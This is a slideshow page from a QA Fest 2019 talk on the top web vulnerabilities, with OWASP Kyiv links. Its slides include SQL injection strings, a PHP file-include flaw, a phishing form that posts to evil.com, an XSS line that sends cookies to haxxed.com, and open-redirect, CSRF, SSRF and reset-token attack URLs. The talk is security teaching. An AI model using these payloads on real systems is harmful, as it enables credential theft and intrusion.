Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

33 views

Published on

Поговоримо про найпопулярніші помилки, яких припускаються розробники веб додатків, та як зловмисник може використати їх на свою користь. Охопимо максимальну кількість матеріалу за короткий проміжок часу.

Published in: Education
  • Be the first to comment

  • Be the first to like this

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

  1. 1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках
  2. 2. Bugcrowd’s Vulnerability Rating Taxonomy
  3. 3. RCE Remote Code Execution | Code injection
  4. 4. RCE Remote Code Execution | Code injection
  5. 5. SQL Injection
  6. 6. SQL Injection
  7. 7. SQL Injection
  8. 8. SQL Injection
  9. 9. SQL Injection
  10. 10. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection
  11. 11. XXE |XML external entity injection
  12. 12. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php
  13. 13. DIRECTORY TRAVERSAL
  14. 14. UNSAFE FILE UPLOAD
  15. 15. UNSAFE FILE UPLOAD
  16. 16. CRLF injection (CRLF, rn, %0A%0D)
  17. 17. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
  18. 18. XSS | Cross Site Scripting
  19. 19. XSS Stored/Reflected
  20. 20. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
  21. 21. Open Redirection https://bank.com/redirect.php?go=http://attacker.com/phish/
  22. 22. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery
  23. 23. CSRF | Cross-Site Request Forgery
  24. 24. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status
  25. 25. Default Credentials/Configuration
  26. 26. Authentication Bypass
  27. 27. Weak Password Policy
  28. 28. Weak password reset question/answer
  29. 29. Weak password change/reset http://bank.com/reset_password?email=ololo@example.com&token=1561324612 http://bank.com/reset_password?email=ololo@example.com&token=1561324754 http://bank.com/reset_password?email=ololo@example.com&token=1561324698 MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36
  30. 30. Bypass 2FA
  31. 31. Privilege Escalation
  32. 32. Broken Access Control http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
  33. 33. COOKIES Attributes
  34. 34. Session Fixation
  35. 35. Password API Keys /.git/ Sensitive Data Exposure
  36. 36. Directory Listing DirSearch (backups, logs, etc.)
  37. 37. Unencrypted Communication
  38. 38. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass
  39. 39. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version
  40. 40. Detailed Error
  41. 41. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/

×